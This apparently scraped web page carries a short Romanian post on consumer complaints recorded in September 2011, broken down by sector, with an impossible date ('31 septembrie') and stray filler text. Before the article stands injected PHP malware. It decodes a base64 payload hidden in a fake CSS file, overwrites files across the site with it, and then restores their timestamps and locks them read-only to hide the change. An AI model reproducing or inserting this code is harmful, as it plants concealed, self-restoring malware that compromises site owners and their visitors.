$wp_update_file="/home/shuffles/public_html/wp-includes/css/wp-timer.css"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } } Reclamatii Septembrie – O noua atitudine

Din studiile efectuate asupra reclamatiilor înregistrate de către A.N.P.C.P.P.S. Romania, în perioada 01 septembrie – 31 septembrie 2011 s-au înregistrat 81 de reclamatii dintre care:

–  Telefonie fixa/mobilă/TV prin cablu/ digitală – 26 %

–  Furnizori de utilitati – 9 %

–  Bănci/Instituţii nebancare –  5 %

–  Auto/Transport –  6 %

–  Turism/Servicii hoteliere/Linii aeriene – 2 %

–  Retail – 28 %

–  Alimente –  5 %

–  Autorităţi ale Administraţiei Publice/ Instituţii Publice – 2 %

–  Servicii – 17 %

asd

By o9admin